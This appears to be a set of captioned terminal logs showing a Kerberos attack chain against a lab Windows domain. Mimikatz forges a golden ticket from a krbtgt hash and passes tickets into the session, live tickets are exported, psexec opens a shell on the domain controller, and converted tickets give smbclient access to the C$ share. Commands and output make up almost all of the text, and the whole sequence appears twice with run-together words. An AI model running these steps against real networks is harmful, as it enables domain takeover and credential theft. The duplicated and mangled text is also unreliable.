Kerberos Modules
1. .#####. mimikatz 2.0 alpha (x64) release "Kiwi en C" (Oct 9201500:33:13)
2. .## ^ ##.
3. ## / ## /* * *
4. ## / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
5. '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
6. '#####' with16 modules * * */
7.
8.
9. mimikatz # kerberos::
10.ERROR mimikatz_doLocal ; "(null)" command of "kerberos"modulenot found !
11.
12.Module : kerberos
13.Full name : Kerberospackagemodule
14.Description :
15.
16. ptt - Pass-the-ticket [NT 6]
17. list - List ticket(s)
18. tgt - Retrieve current TGT
19. purge - Purge ticket(s)
20. golden - WillyWonka factory
21. hash - Hash password to keys
22. ptc - Pass-the-ccache [NT6]
23. clist - List tickets in MIT/Heimdall ccache
24.
25.mimikatz #
Golden Ticket
1. mimikatz # kerberos::golden /user:Administrator /domain:sittingduck.info /sid:S-
2. 1-5-21-2792304509-1851296738-3446580569 /krbtgt:994ceb7e251e5afc550eef79d8172d64
3. /ticket:gold.kirbi
4. User : Administrator
5. Domain : sittingduck.info
6. SID : S-1-5-21-2792304509-1851296738-3446580569
7. UserId : 500
8. GroupsId : *513512520518519
9. ServiceKey: 994ceb7e251e5afc550eef79d8172d64 - rc4_hmac_nt
10.Lifetime : 10/26/201511:28:54 PM ; 10/23/202511:28:54 PM ; 10/23/202511:28:5
11.4 PM
12.-> Ticket : gold.kirbi
13.
14. * PAC generated
15. * PAC signed
16. * EncTicketPart generated
17. * EncTicketPart encrypted
18. * KrbCred generated
19.
20.FinalTicketSaved to file !
Pass the Ticket
1. mimikatz # kerberos::ptt gold.kirbi
2. 0 - File'gold.kirbi' : OK
3.
4. mimikatz # kerberos::list
5.
6. [00000000] - 0x00000017 - rc4_hmac_nt
7. Start/End/MaxRenew: 10/26/201511:28:54 PM ; 10/23/202511:28:54 PM ; 10/23/2
8. 02511:28:54 PM
9. ServerName : krbtgt/sittingduck.info @ sittingduck.info
10. ClientName : Administrator @ sittingduck.info
11. Flags40e00000 : pre_authent ; initial ; renewable ; forwardable ;
12.
13.mimikatz #
Injecting tickets with Kirbikator
1. C:Users otanadminDesktop>kirbikator.exe lsa gold.kirbi
2.
3. .#####. KiRBikator1.0 (x86) release "Kiwi en C" (Feb 1201503:37:29)
4. .## ^ ##.
5. ## / ## /* * *
6. ## / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
7. '## v ##' http://blog.gentilkiwi.com (oe.eo)
8. '#####' * * */
9.
10.Destination : Microsoft LSA API (multiple)
11. < gold.kirbi (RFC KRB-CRED (#22))
12. > TicketAdministrator@sittingduck.info-krbtgt~sittingduck.info@sittingduck.inf
13.o : injected
Exporting active tickets
1. mimikatz # kerberos::list /export
2.
3. [00000000] - 0x00000012 - aes256_hmac
4. Start/End/MaxRenew: 10/26/201511:39:32 PM ; 10/27/20159:39:31 AM ; 11/2/201
5. 511:39:31 PM
6. ServerName : krbtgt/SITTINGDUCK.INFO @ SITTINGDUCK.INFO
7. ClientName : uberuser @ SITTINGDUCK.INFO
8. Flags60a10000 : name_canonicalize ; pre_authent ; renewable ; forwarded ;
9. forwardable ;
10. * Saved to file : 0-60a10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK
11..INFO.kirbi
12.
13.[00000001] - 0x00000012 - aes256_hmac
14. Start/End/MaxRenew: 10/26/201511:39:31 PM ; 10/27/20159:39:31 AM ; 11/2/201
15.511:39:31 PM
16. ServerName : krbtgt/SITTINGDUCK.INFO @ SITTINGDUCK.INFO
17. ClientName : uberuser @ SITTINGDUCK.INFO
18. Flags40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; f
19.orwardable ;
20. * Saved to file : 1-40e10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK
21..INFO.kirbi
22.
23.[00000002] - 0x00000012 - aes256_hmac
24. Start/End/MaxRenew: 10/26/201511:39:32 PM ; 10/27/20159:39:31 AM ; 11/2/201
25.511:39:31 PM
26. ServerName : cifs/dc1.sittingduck.info @ SITTINGDUCK.INFO
27. ClientName : uberuser @ SITTINGDUCK.INFO
28. Flags40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewa
29.ble ; forwardable ;
30. * Saved to file : 2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDU
31.CK.INFO.kirbi
32.
33.[00000003] - 0x00000012 - aes256_hmac
34. Start/End/MaxRenew: 10/26/201511:39:32 PM ; 10/27/20159:39:31 AM ; 11/2/201
35.511:39:31 PM
36. ServerName : ldap/dc1.sittingduck.info @ SITTINGDUCK.INFO
37. ClientName : uberuser @ SITTINGDUCK.INFO
38. Flags40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewa
39.ble ; forwardable ;
40. * Saved to file : 3-40a50000-uberuser@ldap~dc1.sittingduck.info-SITTINGDU
41.CK.INFO.kirbi
42.
43.[00000004] - 0x00000012 - aes256_hmac
44. Start/End/MaxRenew: 10/26/201511:39:31 PM ; 10/27/20159:39:31 AM ; 11/2/201
45.511:39:31 PM
46. ServerName : LDAP/dc1.sittingduck.info/sittingduck.info @ SITTINGDUCK.
47.INFO
48. ClientName : uberuser @ SITTINGDUCK.INFO
49. Flags40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewa
50.ble ; forwardable ;
51. * Saved to file : 4-40a50000-uberuser@LDAP~dc1.sittingduck.info~sittingdu
52.ck.info-SITTINGDUCK.INFO.kirbi
PSEXEC with standard Kerberos tickets
1. mimikatz # kerberos::list
2.
3. mimikatz # (EMPTY LIST)
4.
5. mimikatz # kerberos::ptt 1-40e10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK
6. .INFO.kirbi
7. 0 - File'1-40e10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK.INFO.kirbi'
8. : OK
9.
10.mimikatz # kerberos::ptt 2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDU
11.CK.INFO.kirbi
12. 0 - File'2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDUCK.INFO.kirbi
13.' : OK
14.
15.mimikatz # kerberos::list
16.
17.[00000000] - 0x00000012 - aes256_hmac
18. Start/End/MaxRenew: 10/26/201511:39:31 PM ; 10/27/20159:39:31 AM ; 11/2/201
19.511:39:31 PM
20. ServerName : krbtgt/SITTINGDUCK.INFO @ SITTINGDUCK.INFO
21. ClientName : uberuser @ SITTINGDUCK.INFO
22. Flags40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; f
23.orwardable ;
24.
25.[00000001] - 0x00000012 - aes256_hmac
26. Start/End/MaxRenew: 10/26/201511:39:32 PM ; 10/27/20159:39:31 AM ; 11/2/201
27.511:39:31 PM
28. ServerName : cifs/dc1.sittingduck.info @ SITTINGDUCK.INFO
29. ClientName : uberuser @ SITTINGDUCK.INFO
30. Flags40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewa
31.ble ; forwardable ;
32.
33.mimikatz #
34.
35.
36.
37.C:Users otanadminDesktop>psexec \dc1 cmd.exe
38.
39.PsExec v1.97 - Execute processes remotely
40.Copyright (C) 2001-2009MarkRussinovich
41.Sysinternals - www.sysinternals.com
42.
43.
44.MicrosoftWindows [Version6.3.9600]
45.(c) 2013MicrosoftCorporation. All rights reserved.
46.
47.C:Windowssystem32>whoami
48.sittingduckuberuser
49.
50.C:Windowssystem32>echo %COMPUTERNAME%
51.DC1
52.
53.C:Windowssystem32>
Convert Mimikatz Kerberos ticket to CCache and use
1. C:Users otanadminDesktop>kirbikator.exe ccache "2-40a50000-uberuser@cifs~dc1.
2. sittingduck.info-SITTINGDUCK.INFO.kirbi"
3.
4. .#####. KiRBikator1.0 (x86) release "Kiwi en C" (Feb 1201503:37:29)
5. .## ^ ##.
6. ## / ## /* * *
7. ## / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
8. '## v ##' http://blog.gentilkiwi.com (oe.eo)
9. '#####' * * */
10.
11.Destination : MIT CredentialCache (simple)
12. < 2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDUCK.INFO.kirbi (RFC KRB
13.-CRED (#22))
14. > Single file : uberuser@SITTINGDUCK.INFO.ccache
15.
16.C:Users otanadminDesktop>
Method 1
1. KRB5CCNAME=uberuser@SITTINGDUCK.INFO.ccache smbclient -k //dc1.sittingduck.info/c$
2. OS=[WindowsServer2012 R2 Standard9600] Server=[WindowsServer2012 R2 Standard6.3]
3. smb: >
Method 2
1. root@kali:~# apt-get install krb5-user
2. Readingpackage lists... Done
3. Building dependency tree
4. Reading state information... Done
5. The following extra packages will be installed:
6. krb5-config libgssrpc4 libkadm5clnt-mit9 libkadm5srv-mit9 libkdb5-7
7. Suggested packages:
8. krb5-doc
9. The following NEW packages will be installed:
10. krb5-config krb5-user libgssrpc4 libkadm5clnt-mit9 libkadm5srv-mit9 libkdb5-7
11.0 upgraded, 6 newly installed, 0 to remove and0not upgraded.
12.Need to get466 kB of archives.
13.Afterthis operation, 1,199 kB of additional disk space will be used.
14.Do you want to continue? [Y/n] y
15.0% [Connecting to http.kali.org]
16.<SNIP>
17.<SNIP>
18.<SNIP>
19.
20.root@kali:~/Desktop# klist
21.klist: Credentials cache file '/tmp/krb5cc_0'not found
22.root@kali:~/Desktop# cp uberuser@SITTINGDUCK.INFO.ccache /tmp/krb5cc_0
23.root@kali:~/Desktop# smbclient -k //dc1.sittingduck.info/c$
24.OS=[WindowsServer2012 R2 Standard9600] Server=[WindowsServer2012 R2 Standard6.3]
25.smb: >
Kerberos Modules
1. .#####. mimikatz 2.0 alpha (x64) release "Kiwi en C" (Oct 9201500:33:13)
2. .## ^ ##.
3. ## / ## /* * *
4. ## / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
5. '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
6. '#####' with16 modules * * */
7.
8.
9. mimikatz # kerberos::
10.ERROR mimikatz_doLocal ; "(null)" command of "kerberos"modulenot found !
11.
12.Module : kerberos
13.Full name : Kerberospackagemodule
14.Description :
15.
16. ptt - Pass-the-ticket [NT 6]
17. list - List ticket(s)
18. tgt - Retrieve current TGT
19. purge - Purge ticket(s)
20. golden - WillyWonka factory
21. hash - Hash password to keys
22. ptc - Pass-the-ccache [NT6]
23. clist - List tickets in MIT/Heimdall ccache
24.
25.mimikatz #
Golden Ticket
1. mimikatz # kerberos::golden /user:Administrator /domain:sittingduck.info /sid:S-
2. 1-5-21-2792304509-1851296738-3446580569 /krbtgt:994ceb7e251e5afc550eef79d8172d64
3. /ticket:gold.kirbi
4. User : Administrator
5. Domain : sittingduck.info
6. SID : S-1-5-21-2792304509-1851296738-3446580569
7. UserId : 500
8. GroupsId : *513512520518519
9. ServiceKey: 994ceb7e251e5afc550eef79d8172d64 - rc4_hmac_nt
10.Lifetime : 10/26/201511:28:54 PM ; 10/23/202511:28:54 PM ; 10/23/202511:28:5
11.4 PM
12.-> Ticket : gold.kirbi
13.
14. * PAC generated
15. * PAC signed
16. * EncTicketPart generated
17. * EncTicketPart encrypted
18. * KrbCred generated
19.
20.FinalTicketSaved to file !
Pass the Ticket
1. mimikatz # kerberos::ptt gold.kirbi
2. 0 - File'gold.kirbi' : OK
3.
4. mimikatz # kerberos::list
5.
6. [00000000] - 0x00000017 - rc4_hmac_nt
7. Start/End/MaxRenew: 10/26/201511:28:54 PM ; 10/23/202511:28:54 PM ; 10/23/2
8. 02511:28:54 PM
9. ServerName : krbtgt/sittingduck.info @ sittingduck.info
10. ClientName : Administrator @ sittingduck.info
11. Flags40e00000 : pre_authent ; initial ; renewable ; forwardable ;
12.
13.mimikatz #
Injecting tickets with Kirbikator
1. C:Users otanadminDesktop>kirbikator.exe lsa gold.kirbi
2.
3. .#####. KiRBikator1.0 (x86) release "Kiwi en C" (Feb 1201503:37:29)
4. .## ^ ##.
5. ## / ## /* * *
6. ## / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
7. '## v ##' http://blog.gentilkiwi.com (oe.eo)
8. '#####' * * */
9.
10.Destination : Microsoft LSA API (multiple)
11. < gold.kirbi (RFC KRB-CRED (#22))
12. > TicketAdministrator@sittingduck.info-krbtgt~sittingduck.info@sittingduck.inf
13.o : injected
Exporting active tickets
1. mimikatz # kerberos::list /export
2.
3. [00000000] - 0x00000012 - aes256_hmac
4. Start/End/MaxRenew: 10/26/201511:39:32 PM ; 10/27/20159:39:31 AM ; 11/2/201
5. 511:39:31 PM
6. ServerName : krbtgt/SITTINGDUCK.INFO @ SITTINGDUCK.INFO
7. ClientName : uberuser @ SITTINGDUCK.INFO
8. Flags60a10000 : name_canonicalize ; pre_authent ; renewable ; forwarded ;
9. forwardable ;
10. * Saved to file : 0-60a10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK
11..INFO.kirbi
12.
13.[00000001] - 0x00000012 - aes256_hmac
14. Start/End/MaxRenew: 10/26/201511:39:31 PM ; 10/27/20159:39:31 AM ; 11/2/201
15.511:39:31 PM
16. ServerName : krbtgt/SITTINGDUCK.INFO @ SITTINGDUCK.INFO
17. ClientName : uberuser @ SITTINGDUCK.INFO
18. Flags40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; f
19.orwardable ;
20. * Saved to file : 1-40e10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK
21..INFO.kirbi
22.
23.[00000002] - 0x00000012 - aes256_hmac
24. Start/End/MaxRenew: 10/26/201511:39:32 PM ; 10/27/20159:39:31 AM ; 11/2/201
25.511:39:31 PM
26. ServerName : cifs/dc1.sittingduck.info @ SITTINGDUCK.INFO
27. ClientName : uberuser @ SITTINGDUCK.INFO
28. Flags40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewa
29.ble ; forwardable ;
30. * Saved to file : 2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDU
31.CK.INFO.kirbi
32.
33.[00000003] - 0x00000012 - aes256_hmac
34. Start/End/MaxRenew: 10/26/201511:39:32 PM ; 10/27/20159:39:31 AM ; 11/2/201
35.511:39:31 PM
36. ServerName : ldap/dc1.sittingduck.info @ SITTINGDUCK.INFO
37. ClientName : uberuser @ SITTINGDUCK.INFO
38. Flags40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewa
39.ble ; forwardable ;
40. * Saved to file : 3-40a50000-uberuser@ldap~dc1.sittingduck.info-SITTINGDU
41.CK.INFO.kirbi
42.
43.[00000004] - 0x00000012 - aes256_hmac
44. Start/End/MaxRenew: 10/26/201511:39:31 PM ; 10/27/20159:39:31 AM ; 11/2/201
45.511:39:31 PM
46. ServerName : LDAP/dc1.sittingduck.info/sittingduck.info @ SITTINGDUCK.
47.INFO
48. ClientName : uberuser @ SITTINGDUCK.INFO
49. Flags40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewa
50.ble ; forwardable ;
51. * Saved to file : 4-40a50000-uberuser@LDAP~dc1.sittingduck.info~sittingdu
52.ck.info-SITTINGDUCK.INFO.kirbi
PSEXEC with standard Kerberos tickets
1. mimikatz # kerberos::list
2.
3. mimikatz # (EMPTY LIST)
4.
5. mimikatz # kerberos::ptt 1-40e10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK
6. .INFO.kirbi
7. 0 - File'1-40e10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK.INFO.kirbi'
8. : OK
9.
10.mimikatz # kerberos::ptt 2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDU
11.CK.INFO.kirbi
12. 0 - File'2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDUCK.INFO.kirbi
13.' : OK
14.
15.mimikatz # kerberos::list
16.
17.[00000000] - 0x00000012 - aes256_hmac
18. Start/End/MaxRenew: 10/26/201511:39:31 PM ; 10/27/20159:39:31 AM ; 11/2/201
19.511:39:31 PM
20. ServerName : krbtgt/SITTINGDUCK.INFO @ SITTINGDUCK.INFO
21. ClientName : uberuser @ SITTINGDUCK.INFO
22. Flags40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; f
23.orwardable ;
24.
25.[00000001] - 0x00000012 - aes256_hmac
26. Start/End/MaxRenew: 10/26/201511:39:32 PM ; 10/27/20159:39:31 AM ; 11/2/201
27.511:39:31 PM
28. ServerName : cifs/dc1.sittingduck.info @ SITTINGDUCK.INFO
29. ClientName : uberuser @ SITTINGDUCK.INFO
30. Flags40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewa
31.ble ; forwardable ;
32.
33.mimikatz #
34.
35.
36.
37.C:Users otanadminDesktop>psexec \dc1 cmd.exe
38.
39.PsExec v1.97 - Execute processes remotely
40.Copyright (C) 2001-2009MarkRussinovich
41.Sysinternals - www.sysinternals.com
42.
43.
44.MicrosoftWindows [Version6.3.9600]
45.(c) 2013MicrosoftCorporation. All rights reserved.
46.
47.C:Windowssystem32>whoami
48.sittingduckuberuser
49.
50.C:Windowssystem32>echo %COMPUTERNAME%
51.DC1
52.
53.C:Windowssystem32>
Convert Mimikatz Kerberos ticket to CCache and use
1. C:Users otanadminDesktop>kirbikator.exe ccache "2-40a50000-uberuser@cifs~dc1.
2. sittingduck.info-SITTINGDUCK.INFO.kirbi"
3.
4. .#####. KiRBikator1.0 (x86) release "Kiwi en C" (Feb 1201503:37:29)
5. .## ^ ##.
6. ## / ## /* * *
7. ## / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
8. '## v ##' http://blog.gentilkiwi.com (oe.eo)
9. '#####' * * */
10.
11.Destination : MIT CredentialCache (simple)
12. < 2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDUCK.INFO.kirbi (RFC KRB
13.-CRED (#22))
14. > Single file : uberuser@SITTINGDUCK.INFO.ccache
15.
16.C:Users otanadminDesktop>
Method 1
1. KRB5CCNAME=uberuser@SITTINGDUCK.INFO.ccache smbclient -k //dc1.sittingduck.info/c$
2. OS=[WindowsServer2012 R2 Standard9600] Server=[WindowsServer2012 R2 Standard6.3]
3. smb: >
Method 2
1. root@kali:~# apt-get install krb5-user
2. Readingpackage lists... Done
3. Building dependency tree
4. Reading state information... Done
5. The following extra packages will be installed:
6. krb5-config libgssrpc4 libkadm5clnt-mit9 libkadm5srv-mit9 libkdb5-7
7. Suggested packages:
8. krb5-doc
9. The following NEW packages will be installed:
10. krb5-config krb5-user libgssrpc4 libkadm5clnt-mit9 libkadm5srv-mit9 libkdb5-7
11.0 upgraded, 6 newly installed, 0 to remove and0not upgraded.
12.Need to get466 kB of archives.
13.Afterthis operation, 1,199 kB of additional disk space will be used.
14.Do you want to continue? [Y/n] y
15.0% [Connecting to http.kali.org]
16.<SNIP>
17.<SNIP>
18.<SNIP>
19.
20.root@kali:~/Desktop# klist
21.klist: Credentials cache file '/tmp/krb5cc_0'not found
22.root@kali:~/Desktop# cp uberuser@SITTINGDUCK.INFO.ccache /tmp/krb5cc_0
23.root@kali:~/Desktop# smbclient -k //dc1.sittingduck.info/c$
24.OS=[WindowsServer2012 R2 Standard9600] Server=[WindowsServer2012 R2 Standard6.3]
25.smb: >